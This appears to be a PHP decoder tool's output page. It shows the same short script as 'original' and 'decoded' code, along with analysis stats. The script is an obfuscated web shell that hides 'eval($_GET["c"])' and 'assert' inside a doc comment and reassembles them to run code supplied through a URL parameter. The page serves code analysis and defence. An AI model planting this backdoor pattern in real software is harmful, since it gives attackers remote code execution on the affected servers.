Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php /** * eva * l($_GE * T["c"]); * asse * rt */ ..

Decoded Output download

<?php 
    /** 
    * eva 
    * l($_GE 
    * T["c"]); 
    * asse 
    * rt 
    */ 
    class TestClass { } 
    $rc = new ReflectionClass('TestClass'); 
    $str = $rc->getDocComment(); 
    die(var_dump($str)); 
    $evf=substr($str,strpos($str,'e'),3); 
    $evf=$evf.substr($str,strpos($str,'l'),6); 
    $evf=$evf.substr($str,strpos($str,'T'),8); 
    $fu=substr($str,strpos($str,'as'),4); 
    $fu=$fu.substr($str,strpos($str,'r'),2); 
    $fu($evf); 
?> 

Did this file decode correctly?

Original Code

<?php
    /**
    * eva
    * l($_GE
    * T["c"]);
    * asse
    * rt
    */
    class TestClass { }
    $rc = new ReflectionClass('TestClass');
    $str = $rc->getDocComment();
    die(var_dump($str));
    $evf=substr($str,strpos($str,'e'),3);
    $evf=$evf.substr($str,strpos($str,'l'),6);
    $evf=$evf.substr($str,strpos($str,'T'),8);
    $fu=substr($str,strpos($str,'as'),4);
    $fu=$fu.substr($str,strpos($str,'r'),2);
    $fu($evf);
?> 

Function Calls

None

Variables

None

Stats

MD5 dcf3bb799ba9b2aa5349e8b678fd2f8b
Eval Count 0
Decode Time 97 ms